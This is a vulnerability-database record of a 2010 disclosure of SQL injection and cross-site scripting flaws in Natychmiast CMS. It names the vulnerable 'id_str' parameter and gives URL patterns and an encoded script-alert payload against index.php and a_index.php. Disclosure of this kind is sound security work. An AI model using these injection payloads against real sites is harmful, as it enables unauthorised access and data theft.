Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-11182", "type": "zdt", "bulletinFamily": "exploit", "title": "Natychmiast CMS Cross Site Scripting / SQL Injection Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2010-03-05T00:00:00", "modified": "2010-03-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/11182", "reporter": "Ariko-Security", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-12T17:08:22", "viewCount": 3, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/11182", "sourceData": "==================================================================\r\nNatychmiast CMS Cross Site Scripting / SQL Injection Vulnerability\r\n==================================================================\r\n\r\n SQL injection and XSS vulnerability in NATYCHMIAST CMS \r\n\r\n\r\n\r\nVendor's Description of Software:\r\n# http://www.natychmiast-cms.pl/Natychmiast+CMS.html [Polish]\r\n\r\nDork:\r\n# N/A\r\n\r\nApplication Info:\r\n# Name: NATYCHMIAST CMS\r\nVulnerability Info:\r\n# Type: SQL injection and XSS Vulnerability\r\n# Risk: medium\r\n\r\nFix: \r\n# N/A\r\n\r\nTime Table:\r\n# 03/03/2010 - Vendor notified.\r\n\r\nInput passed via the \"id_str\" parameter to index.php and a_index.php is not properly sanitised before being used in a SQL query.\r\n\r\nSolution:\r\n# Input validation of \"id_str\" parameter should be corrected.\r\n\r\n\r\nVulnerabilities:\r\n# http://[site]/index.php?id_str=[SQLi] \r\n# http://[site]/a_index.php?id_str=[SQLi]\r\n# XSS index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E\r\n# XSS a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "_state": {"dependencies": 1647118359}}